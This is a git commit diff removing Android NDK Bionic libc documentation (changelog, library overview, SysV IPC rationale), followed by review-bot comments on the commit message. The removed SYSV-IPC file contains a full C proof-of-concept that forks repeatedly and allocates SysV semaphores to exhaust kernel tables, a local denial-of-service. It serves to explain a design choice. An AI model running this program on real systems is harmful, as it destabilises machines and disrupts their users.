author | Andrew Hsieh <andrewhsieh@google.com> | 2014-10-28 14:09:48 -0700 |
---|---|---|
committer | Andrew Hsieh <andrewhsieh@google.com> | 2014-10-28 14:10:20 -0700 |
commit | 0173061840137ca92a6d7e4a5717f1b98cda0870 (patch) | |
tree | eb25f0882946b02e5ab537ee49c5517486d01d49 /docs | |
parent | 1b89d63868718a383490066c47ced8b31a601519 (diff) | |
download | ndk-0173061840137ca92a6d7e4a5717f1b98cda0870.tar.gz |
Remove obsolete libc doc
See b.android.com/72883
Change-Id: Ia6a6e699e5bba43d3fa7cdc37e8b19609b0870a0
Diffstat (limited to 'docs')
-rw-r--r-- | docs/Additional_library_docs/libc/libc/CHANGES.text | 260 | ||||
-rw-r--r-- | docs/Additional_library_docs/libc/libc/OVERVIEW.text | 389 | ||||
-rw-r--r-- | docs/Additional_library_docs/libc/libc/SYSV-IPC.text | 104 |
3 files changed, 0 insertions, 753 deletions
diff --git a/docs/Additional_library_docs/libc/libc/CHANGES.text b/docs/Additional_library_docs/libc/libc/CHANGES.text deleted file mode 100644 index 4f4bbee4d..000000000 --- a/docs/Additional_library_docs/libc/libc/CHANGES.text +++ /dev/null 
@@ -1,260 +0,0 @@ -<html><body><pre>Bionic ChangeLog: ------------------ - -------------------------------------------------------------------------------- -Differences between Android 2.3 and Android 2.2: - -- <pthread.h>: Add reader/writer locks implementation. Add sanity - checking to pthread_mutex_destroy() (e.g. a locked mutex will return - EBUSY). - -- <semaphore.h>: Use private futexes for semaphore implementation, - unless your set 'pshared' to non-0 when calling sem_init(). - - Also fixed a bug in sem_post() to make it wake up all waiting - threads, instead of one. As a consequence, the maximum semaphore - value is now reduced to 0x3fffffff. - -- <math.h>: Added sincos(), sincosf() and sincosl() (GLibc compatibility). - -- <sys/sysinfo.h>: Added missing sysinfo() system call implementation - (the function was already declared in the header though). - -- sysconf() didn't work for some arguments due to a small bug in the - /proc line parser. - -- <termio.h>: added missing header (just includes <termios.h>) - -- <unistd.h>: add missing declaration for truncate(). The implementation - was already here since Android 1.5. - - modify implementation of alarm() to return 0 in case of error (i.e. - if a value larger than 0x7fffffff seconds is passed to it). This - makes the implementation compliant with the GLibc behaviour. - -- <wchar.h>: small fixes to really support wchar_t in Bionic (not there yet). - - the size of wchar_t is still 32-bit (decided by the compiler) - - WCHAR_MIN: changed from 0 to INT_MIN - WCHAR_MAX: changed from 255 to INT_MAX - - wcpcpy(), wcpncpy(), wcscat(), wcschr(), wcscmp(), - wcscpy(), wcscspn(), wcsdup(), wcslcat(), wcslcpy(), - wcslen(), wcsncat(), wcsncmp(), wcsncpy(), wcsnlen(), - wcspbrk(), wcsrchr(), wcsrchr(), wcsspn(), wcsstr(), - wcstok(), wcswidth(), wmemchr(), wmemcmp(), wmemcpy(), - wmemmove(), wmemset(): Added proper implementations. 
- - wcscasecmp(), wcsncasecmp(): Added implementation limited - to ASCII codes for lower/upper. - - wcscoll(): added dummy implementation that calls wcscmp() - wcsxfrm(): added dummy implementation that calls wcsncpy() - - NOTE: Technically, this breaks the ABI, but we never claimed to support - wchar_t anyway. The wchar_t support is still *NOT* official at this - point. We need better multi-byte support code, and wprintf/wscanf - stuff too. - -- <inttypes.h>: add missing declarations for strntoimax abd strntoumax. - -- <stdlib.h>: add missing declarations for drand48() and erand48(). - -- clearerr(): fix broken implementation. - -- Feature test macros like _POSIX_C_SOURCE / _XOPEN_SOURCE / _C99_SOURCE - are now handled correctly by our C library headers (see <sys/cdefs.h>) - -- <sys/select.h>: add missing declaration for pselect() - -- <sys/vfs.h>: fixed implementation of fstatfs() (also fixes fpathconf() - which uses it). - -- Added an implementation of pthread_atfork() - -- <dlfcn.h>: fixed dlopen() implementation to support dlopen(NULL, ...). - This allows one to look at the dynamic symbols exported by an executable. - -- <private/bionic_tls.h>: use kernel helper functions for static versions - of the C library. This is necessary because we don't know where the corresponding - machine code is going to run, and the optimization for __get_tls() might - not match the features of the target device where we run a static executable - linked to the C library. This fixes one of the bug that explains why gdbserver - didn't work well with threads. - -------------------------------------------------------------------------------- -Differences between Android 2.2. and Android 2.1: - -- Support FP register save/load in setjmp()/longjmp() on ARMv7 builds. - -- Add support for SH-4 CPU architecture ! - -- __atomic_swap(): use LDREX/STREX CPU instructions on ARMv6 and higher. - -- <arpa/telnet.h>: New header (declarations only, no implementation). 
- -- <err.h>: New header + implementation. GLibc compatibility. - -- <warn.h>: New header + implementation. GLibc compatibility. - -- <fts.h>: New header + implementation. - -- <mntent.h>: Add missing <stdio.h> include. - -- <regex.h>: New header + implementation. - -- <signal.h>: Added killpg() - -- <stdint.h>: Allow 64-bit type declarations on C99 builds. - -- <stdio.h>: Add fdprintf() and vfdprintf(). Note that GLibc provides - the confusing 'dprintf' and 'vdprintf()' functions instead. - -- <stdlib.h>: Fix ptsname_r(): the return type is int instead of char*. - The mistake comes from a GLibc man page bug (the man page listed a return - type of char*, while the implementation used int. Fixed in late 2009 only). - The Bionic implementation was incorrect. Technically, this is an ABI - breakage, but code that used this function probably never worked or - compiled properly anyway. - -- <strings.h>: Add missing <sys/types.h> include. - -- <sys/queue.h>: Added new header (no implementation - macro templates). - -- <sys/resource.h>: Add rlim_t proper definition. - -- <time64.h>: Add missing C++ header inclusion guards. - -- <unistd.h>: Add getusershell(), setusershell() and endusershell(), though - implementation are bogus. GLibc compatibility. - -- <wchar.h>: Add mbstowcs() and wcstombs() - -- add clone() implementation for ARM (x86 and SH-4 not working yet). - -- <sys/epoll.h>: <sys/system_properties.h>: Add missing C++ inclusion guards - -- fix getpwnam() and getpwgrp() to accept "app_0" as a valid user name. - -- fix sem_trywait() to return -1 and set errno to EAGAIN, instead of - returning EAGAIN directly. - -- fix sem_post() to wake up multiple threads when called rapidly in - succession. - -- DNS: partial implementation of RFC3484 (rule 1, 2, 5, 6, 8, 10 and - modified rule 9), for better address selection/sorting. - In the process, removed code that was previously used for "sortlist" - in /etc/resolv.conf. 
(resolv.conf is already ignored, so the latter - is a no-op for actual functionality.) - -- fix pthread_sigmask() to properly return an error code without touching - errno. Previous implementation returned -1 on error, setting errno, which - is not Posix compliant. - -- add sigaltstack() implementation for ARM. - -- <time.h>: Properly implement the 'timezone' and 'daylight' global variables - (they were not defined previously, though declared in the header). - -- <time.h>: Fix timezone management implementation to properly update - 'tm_gmtoff' field in 'struct tm' structure. - -- DNS: get rid of spurious random DNS queries when trying to resolve - an unknown domain name. Due to an initialization bug, a random DNS search - list was generated for each thread if net.dns.search is not defined. - -- <pthread.h>: Add pthread_condattr_init/destroy/setpshared/getpshared functions - to enable proper shared conditional variable initialization. - - Modify the pthread_mutex_t and pthread_cond_t implementation to use private - futexes for performance reasons. Mutexes and Condvars are no longer shareable - between processes by default anymore, unless you use PTHREAD_PROCESS_SHARED - with pthread_mutexattr_setpshared() and/or pthread_condattr_setpshared(). - -------------------------------------------------------------------------------- -Differences between Android 2.1 and 2.0.1: - -- zoneinfo: updated data tables to version 2009s - - -------------------------------------------------------------------------------- -Differences between Android 2.0.1 and 2.0: - -- abort(): ARM-specific hack to preserve the 'lr' register when abort() - is called (GCC does not preserve it by default since it thinks that - abort() never returns). This improves stack traces considerably. - - -------------------------------------------------------------------------------- -Differences between Android 2.0 and 1.6: - -- memcmp(), memcpy(): ARMv7 optimized versions. 
- -- pthread_mutexattr_setpshared(): implementation will not return ENOTSUP - if PTHREAD_PROCESS_SHARED is used, because our Mutex implementation can - work across multiple processes. - - *HOWEVER* it does not use "robust futexes" which means that held mutexes - *are not* automatically released by the kernel when the owner process - crashes or exits. This is only done to simplify communication between - two always-live system processes, DO NOT USE THIS IN APPLICATIONS ! - -- pthread_mutex_lock_timeout_np(): New Android-specific function to - perform a timed lock (). In case of timeout, it returns EBUSY. - -- pthread_cond_timedwait_monotonic_np(): Same as pthread_cond_timedwait() - but uses the monotonic clock(). Android-specific. - -- pthread_cond_timedwait_relative_np(): Same as pthread_cond_timedwait() - but uses a relative timeout instead. Android-specific. - -- <netinet/in.h>: Now includes <netinet/in6.h>. - -- <netinet/in6.h>: Added IPV6_JOIN_GROUP, IPV6_LEAVE_GROUP, IN6ADDR_ANY_INIT - and ipv6mr_interface definitions. - -- <time.h>: - * Add missing tzset() declaration. - * Add Android-specific strftime_tz(). - -- getaddrinfo(): - Only perform IPv6 lookup for AF_UNSPEC if we have IPv6 connectivity. - This saves one DNS query per lookup on non-IPv6 systems. - -- mktime(): Fix an infinite loop problem that appeared when switching to - GCC 4.4.0. - -- strftime(): fix incorrect handling of dates > 2038 due to 64-bit issue - in original code. - -------------------------------------------------------------------------------- -Differences between Android 1.6 and 1.5: - -- C runtime: Fix runtime initialization to be called before any static C++ - constructors. This allows these to use pthread functions properly. - -- __aeabi_atexit(): Fix implementation to properly call C++ static destructors - when the program exits (or when a shared library is unloaded). 
- -- <sys/stat.h>: added GLibc compatibility macros definitions: - - #define st_atimensec st_atime_nsec - #define st_mtimensec st_mtime_nsec - #define st_ctimensec st_ctime_nsec - -- getaddrinfo(): implementation will now allow numeric ports if ai_socktype is - set to ANY. This is to match the GLibc behaviour. - -- getservent(): and getservent_r() incorrectly returned the port in host-endian - order in the s_port field. It now returns it in big-endian order. - -- DNS: Allow underscore in the middle of DNS labels. While not really - standard, this extension is needed for some VPN configurations and is - supported by other operating systems. - -- DNS: Support for DNS domain search lists through the new net.dns.search - system property. The corresponding value must be a space-separated list of - domain suffixes. -</pre></body></html>
\ No newline at end of file diff --git a/docs/Additional_library_docs/libc/libc/OVERVIEW.text b/docs/Additional_library_docs/libc/libc/OVERVIEW.text deleted file mode 100644 index d02ae573a..000000000 --- a/docs/Additional_library_docs/libc/libc/OVERVIEW.text +++ /dev/null 
@@ -1,389 +0,0 @@ -<html><body><pre>Bionic C Library Overview: -========================== - -Introduction: - -Core Philosophy: - - The core idea behind Bionic's design is: KEEP IT REALLY SIMPLE. - - This implies that the C library should only provide lightweight wrappers - around kernel facilities and not try to be too smart to deal with edge cases. - - The name "Bionic" comes from the fact that it is part-BSD and part-Linux: - its source code consists of a mix of BSD C library pieces with custom - Linux-specific bits used to deal with threads, processes, signals and a few - others things. - - All original BSD pieces carry the BSD copyright disclaimer. Bionic-specific - bits carry the Android Open Source Project copyright disclaimer. And - everything is released under the BSD license. - -Architectures: - - Bionic currently supports the ARM and x86 instruction sets. In theory, it - should be possible to support more, but this may require a little work (e.g. - adding system call IDs to SYSCALLS.html, described below, or modifying the - dynamic linker). - - The ARM-specific code is under arch-arm/ and the x86-specific one is under - arch-x86/ - - Note that the x86 version is only meant to run on an x86 Android device. We - make absolutely no claim that you could build and use Bionic on a stock x86 - Linux distribution (though that would be cool, so patches are welcomed :-)) - -Syscall stubs: - - Each system call function is implemented by a tiny assembler source fragment - (called a "syscall stub"), which is generated automatically by - tools/gensyscalls.py which reads the SYSCALLS.html file for input. 
- - SYSCALLS.html contains the list of all syscall stubs to generate, along with - the corresponding syscall numeric identifier (which may differ between ARM - and x86), and its signature - - If you modify this file, you may want to use tools/checksyscalls.py which - checks its content against official Linux kernel header files, and will - report errors when invalid syscall ids are used. - - Sometimes, the C library function is really a wrapper that calls the - corresponding syscall with another name. For example, the exit() function - is provided by the C library and calls the _exit() syscall stub. - - See SYSCALLS.html for documentation and details. - - -time_t: - - time_t is 32-bit as defined by the kernel on 32-bit CPUs. A 64-bit version - would be preferable to avoid the Y2038 bug, but the kernel maintainers - consider that this is not needed at the moment. - - Instead, Bionic provides a <time64.h> header that defines a time64_t type, - and related functions like mktime64(), localtime64(), etc... - - -Timezone management: - - The name of the current timezone is taken from the TZ environment variable, - if defined. Otherwise, the system property named 'persist.sys.timezone' is - checked instead. - - The zoneinfo timezone database and index files are located under directory - /system/usr/share/zoneinfo, instead of the more Posix-compliant path of - /usr/share/zoneinfo - - -off_t: - - For similar reasons, off_t is 32-bit. We define loff_t as the 64-bit variant - due to BSD inheritance, but off64_t should be available as a typedef to ease - porting of current Linux-specific code. - - -Linux kernel headers: - - Bionic comes with its own set of "clean" Linux kernel headers to allow - user-space code to use kernel-specific declarations (e.g. IOCTLs, structure - declarations, constants, etc...). 
They are located in: - - ./kernel/common, - ./kernel/arch-arm - ./kernel/arch-x86 - - These headers have been generated by a tool (kernel/tools/update-all.py) to - only include the public definitions from the original Linux kernel headers. - - If you want to know why and how this is done, read kernel/README.TXT to get - all the (gory) details. - - -PThread implementation: - - Bionic's C library comes with its own pthread implementation bundled in. - This is different from other historical C libraries which: - - - place it in an external library (-lpthread) - - play linker tricks with weak symbols at dynamic link time - - The support for real-time features (a.k.a. -lrt) is also bundled in the - C library. - - The implementation is based on futexes and strives to provide *very* short - code paths for common operations. Notable features are the following: - - - pthread_mutex_t, pthread_cond_t are only 4 bytes each. - - - Normal, recursive and error-check mutexes are supported, and the code - path is heavily optimized for the normal case, which is used most of - the time. - - - Process-shared mutexes and condition variables are not supported. - Their implementation requires far more complexity and was absolutely - not needed for Android (which uses other inter-process synchronization - capabilities). - - Note that they could be added in the future without breaking the ABI - by specifying more sophisticated code paths (which may make the common - paths slightly slower though). - - - There is currently no support for read/write locks, priority-ceiling in - mutexes and other more advanced features. Again, the main idea being - that this was not needed for Android at all but could be added in the - future. - -pthread_cancel(): - - pthread_cancel() will *not* be supported in Bionic, because doing this would - involve making the C library significantly bigger for very little benefit. 
- - Consider that: - - - A proper implementation must insert pthread cancellation checks in a lot - of different places of the C library. And conformance is very difficult - to test properly. - - - A proper implementation must also clean up resources, like releasing - memory, or unlocking mutexes, properly if the cancellation happens in a - complex function (e.g. inside gethostbyname() or fprintf() + complex - formatting rules). This tends to slow down the path of many functions. - - - pthread cancellation cannot stop all threads: e.g. it can't do anything - against an infinite loop - - - pthread cancellation itself has short-comings and isn't very portable - (see http://advogato.org/person/slamb/diary.html?start=49 for example). - - All of this is contrary to the Bionic design goals. If your code depends on - thread cancellation, please consider alternatives. - - Note however that Bionic does implement pthread_cleanup_push() and - pthread_cleanup_pop(), which can be used to handle cleanups that happen when - a thread voluntarily exits through pthread_exit() or returning from its - main function. - - -pthread_once(): - - Do not call fork() within a callback provided to pthread_once(). Doing this - may result in a deadlock in the child process the next time it calls - pthread_once(). - - Also, you can't throw a C++ Exception from the callback (see C++ Exception - Support below). - - The current implementation of pthread_once() lacks the necessary support of - multi-core-safe double-checked-locking (read and write barriers). - - -Thread-specific data - - The thread-specific storage only provides for a bit less than 64 - pthread_key_t objects to each process. The implementation provides 64 real - slots but also uses about 5 of them (exact number may depend on - implementation) for its own use (e.g. two slots are pre-allocated by the C - library to speed-up the Android OpenGL sub-system). 
- - Note that Posix mandates a minimum of 128 slots, but we do not claim to be - Posix-compliant. - - Except for the main thread, the TLS area is stored at the top of the stack. - See comments in bionic/libc/bionic/pthread.c for details. - - At the moment, thread-local storage defined through the __thread compiler - keyword is not supported by the Bionic C library and dynamic linker. - - -Multi-core support - - At the moment, Bionic does not provide or use read/write memory barriers. - This means that using it on certain multi-core systems might not be - supported, depending on its exact CPU architecture. - - -Android-specific features: - - Bionic provides a small number of Android-specific features to its clients: - - - access to system properties: - - Android provides a simple shared value/key space to all processes on the - system. It stores a liberal number of 'properties', each of them being a - simple size-limited string that can be associated to a size-limited - string value. - - The header <sys/system_properties.h> can be used to read system - properties and also defines the maximum size of keys and values. - - - Android-specific user/group management: - - There is no /etc/passwd or /etc/groups in Android. By design, it is - meant to be used by a single handset user. On the other hand, Android - uses the Linux user/group management features extensively to secure - process permissions, like access to various filesystem directories. - - In the Android scheme, each installed application gets its own - uid_t/gid_t starting from 10000; lower numerical ids are reserved for - system daemons. - - getpwnam() recognizes some hard-coded subsystems names (e.g. "radio") - and will translate them to their low-user-id values. It also recognizes - "app_1234" as the synthetic name of the application that was installed - with uid 10000 + 1234, which is 11234. 
getgrnam() works similarly - - getgrouplist() will always return a single group for any user name, - which is the one passed as an input parameter. - - getgrgid() will similarly only return a structure that contains a - single-element members list, corresponding to the user with the same - numerical value than the group. - - See bionic/libc/bionic/stubs.c for more details. - - - getservent() - - There is no /etc/services on Android. Instead the C library embeds a - constant list of services in its executable, which is parsed on demand - by the various functions that depend on it. See - bionic/libc/netbsd/net/getservent.c and - bionic/libc/netbsd/net/services.h - - The list of services defined internally might change liberally in the - future. This feature is mostly historically and is very rarely used. - - The getservent() returns thread-local data. getservbyport() and - getservbyname() are also implemented in a similar fashion. - - - getprotoent() - - There is no /etc/protocol on Android. Bionic does not currently - implement getprotoent() and related functions. If added, it will - likely be done in a way similar to getservent() - -DNS resolver: - - Bionic uses a NetBSD-derived resolver library which has been modified in - the following ways: - - - don't implement the name-server-switch feature (a.k.a. <nsswitch.h>) - - - read /system/etc/resolv.conf instead of /etc/resolv.conf - - - read the list of servers from system properties. the code looks for - 'net.dns1', 'net.dns2', etc.. Each property should contain the IP - address of a DNS server. - - these properties are set/modified by other parts of the Android system - (e.g. the dhcpd daemon). - - the implementation also supports per-process DNS server list, using the - properties 'net.dns1.<pid>', 'net.dns2.<pid>', etc... Where <pid> stands - for the numerical ID of the current process. - - - when performing a query, use a properly randomized Query ID (instead of - a incremented one), for increased security. 
- - - when performing a query, bind the local client socket to a random port - for increased security. - - - get rid of *many* unfortunate thread-safety issues in the original code - - Bionic does *not* expose implementation details of its DNS resolver; the - content of <arpa/nameser.h> is intentionally blank. The resolver - implementation might change completely in the future. - - -PThread Real-Time Timers: - - timer_create(), timer_gettime(), timer_settime() and timer_getoverrun() are - supported. - - Bionic also now supports SIGEV_THREAD real-time timers (see timer_create()). - The implementation simply uses a single thread per timer, unlike GLibc which - uses complex heuristics to try to use the less threads possible when several - timers with compatible properties are used. - - This means that if your code uses a lot of SIGEV_THREAD timers, your program - may consume a lot of memory. However, if your program needs many of these - timers, it'd better handle timeout events directly instead. - - Other timers (e.g. SIGEV_SIGNAL) are handled by the kernel and use much less - system resources. - - -Binary Compatibility: - - Bionic is *not* in any way binary-compatible with the GNU C Library, ucLibc - or any known Linux C library. This means several things: - - - You cannot expect to build something against the GNU C Library headers and - have it dynamically link properly to Bionic later. - - - You should *really* use the Android toolchain to build your program against - Bionic. The toolchain deals with many important details that are crucial - to get something working properly. - - Failure to do so will usually result in the inability to run or link your - program, or even runtime crashes. Several random web pages on the Internet - describe how you can successfully write a "hello-world" program with the - ARM GNU toolchain. 
These examples usually work by chance, if anything else, - and you should not follow these instructions unless you want to waste a lot - of your time in the process. - - Note however that you *can* generate a binary that is built against the - GNU C Library headers and then statically linked to it. The corresponding - executable should be able to run (if it doesn't use dlopen()/dlsym()) - - -Dynamic Linker: - - Bionic comes with its own dynamic linker (just like ld.so on Linux really - comes from GLibc). This linker does not support all the relocations - generated by other GCC ARM toolchains. - - -C++ Exceptions Support: - - At the moment, Bionic doesn't support C++ exceptions, what this really means - is the following: - - - If pthread_once() is called with a C++ callback that throws an exception, - then the C library will keep the corresponding pthread_once_t mutex - locked. Any further call to pthread_once() will result in a deadlock. - - A proper implementation should be able to register a C++ exception - cleanup handler before the callback to properly unlock the - pthread_once_t. Unfortunately this requires tricky assembly code that - is highly dependent on the compiler. - - This feature is not planned to be supported anytime soon. - - - The same problem may arise if you throw an exception within a callback - called from the C library. Fortunately, these cases are very rare in the - real-world, but any callback you provide to the C library should *not* - throw an exception. - - - Bionic lacks a few support functions to have exception support work - properly. - -System V IPCs: - - Bionic intentionally does not provide support for System-V IPCs mechanisms, - like the ones provided by semget(), shmget(), msgget(). The reason for this - is to avoid denial-of-service. For a detailed rationale about this, please - read the file docs/SYSV-IPCS.html. 
- -Include Paths: - - The Android build system should automatically provide the necessary include - paths required to build against the C library headers. However, if you want - to do that yourself, you will need to add: - - libc/arch-$ARCH/include - libc/include - libc/kernel/common - libc/kernel/arch-$ARCH - - to your C include path. -</pre></body></html>
\ No newline at end of file diff --git a/docs/Additional_library_docs/libc/libc/SYSV-IPC.text b/docs/Additional_library_docs/libc/libc/SYSV-IPC.text deleted file mode 100644 index 0c2584474..000000000 --- a/docs/Additional_library_docs/libc/libc/SYSV-IPC.text +++ /dev/null 
@@ -1,104 +0,0 @@ -<html><body><pre>Android does not support System V IPCs, i.e. the facilities provided by the -following standard Posix headers: - - <sys/sem.h> /* SysV semaphores */ - <sys/shm.h> /* SysV shared memory segments */ - <sys/msg.h> /* SysV message queues */ - <sys/ipc.h> /* General IPC definitions */ - -The reason for this is due to the fact that, by design, they lead to global -kernel resource leakage. - -For example, there is no way to automatically release a SysV semaphore -allocated in the kernel when: - -- a buggy or malicious process exits -- a non-buggy and non-malicious process crashes or is explicitly killed. - -Killing processes automatically to make room for new ones is an -important part of Android's application lifecycle implementation. This means -that, even assuming only non-buggy and non-malicious code, it is very likely -that over time, the kernel global tables used to implement SysV IPCs will fill -up. - -At that point, strange failures are likely to occur and prevent programs that -use them to run properly until the next reboot of the system. - -And we can't ignore potential malicious applications. 
As a proof of concept -here is a simple exploit that you can run on a standard Linux box today: - ---------------- cut here ------------------------ -#include <sys/sem.h> -#include <sys/wait.h> -#include <unistd.h> -#include <stdio.h> -#include <stdlib.h> -#include <errno.h> - -#define NUM_SEMAPHORES 32 -#define MAX_FAILS 10 - -int main(void) -{ - int counter = 0; - int fails = 0; - - if (counter == IPC_PRIVATE) - counter++; - - printf( "%d (NUM_SEMAPHORES=%d)\n", counter, NUM_SEMAPHORES); - - for (;;) { - int ret = fork(); - int status; - - if (ret < 0) { - perror("fork:"); - break; - } - if (ret == 0) { - /* in the child */ - ret = semget( (key_t)counter, NUM_SEMAPHORES, IPC_CREAT ); - if (ret < 0) { - return errno; - } - return 0; - } - else { - /* in the parent */ - ret = wait(&status); - if (ret < 0) { - perror("waitpid:"); - break; - } - if (status != 0) { - status = WEXITSTATUS(status); - fprintf(stderr, "child %d FAIL at counter=%d: %d\n", ret, - counter, status); - if (++fails >= MAX_FAILS) - break; - } - } - - counter++; - if ((counter % 1000) == 0) { - printf("%d\n", counter); - } - if (counter == IPC_PRIVATE) - counter++; - } - return 0; -} ---------------- cut here ------------------------ - -If you run it on a typical Linux distribution today, you'll discover that it -will quickly fill up the kernel's table of unique key_t values, and that -strange things will happen in some parts of the system, but not all. - -(You can use the "ipcs -u" command to get a summary describing the kernel - tables and their allocations) - -For example, in our experience, anything program launched after that that -calls strerror() will simply crash. The USB sub-system starts spouting weird -errors to the system console, etc... -</pre></body></html> |
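Review bot: in the CHANGES.text hunk, the commit message gives only "obsolete" and a bug link as the reason, yet the removed lines record behaviour changes that code targeting older releases still has to account for. Examples are sem_trywait() returning -1 with errno set to EAGAIN instead of returning EAGAIN directly, pthread_sigmask() returning an error code without touching errno, and mutexes and condition variables no longer being shareable between processes unless PTHREAD_PROCESS_SHARED is set. Please say in the commit message where the maintained changelog lives, or that the NDK no longer ships one, so someone reading the history can find the current source.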
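Review bot: in the OVERVIEW.text hunk, the removed text cross-references other files (SYSCALLS.html, kernel/README.TXT, docs/SYSV-IPCS.html), and the diffstat shows only these three files changing, so nothing that links to OVERVIEW.text is updated here. Please grep the rest of docs/ for references to the three deleted names and fix or drop them in this change. It would also help to note in the commit message which statements were stale: the overview says read/write locks and process-shared mutexes are not supported, while the CHANGES.text removed alongside it records both as added, but the resolver notes on randomized query IDs and random source ports, and the uid allocation starting at 10000, read as design facts rather than outdated ones.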
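Review bot: in the SYSV-IPC.text hunk, the deleted text is a design rationale (SysV IPC objects leak kernel-global resources because nothing releases them when a process crashes or is killed), not a version-specific note, and "obsolete" in the commit message does not say whether that decision still stands. Please state whether <sys/sem.h>, <sys/shm.h>, <sys/msg.h> and <sys/ipc.h> remain unsupported and where the rationale is documented now. Dropping the embedded proof-of-concept program from shipped docs is fine; the explanation of why the headers are missing is the part NDK users will look for.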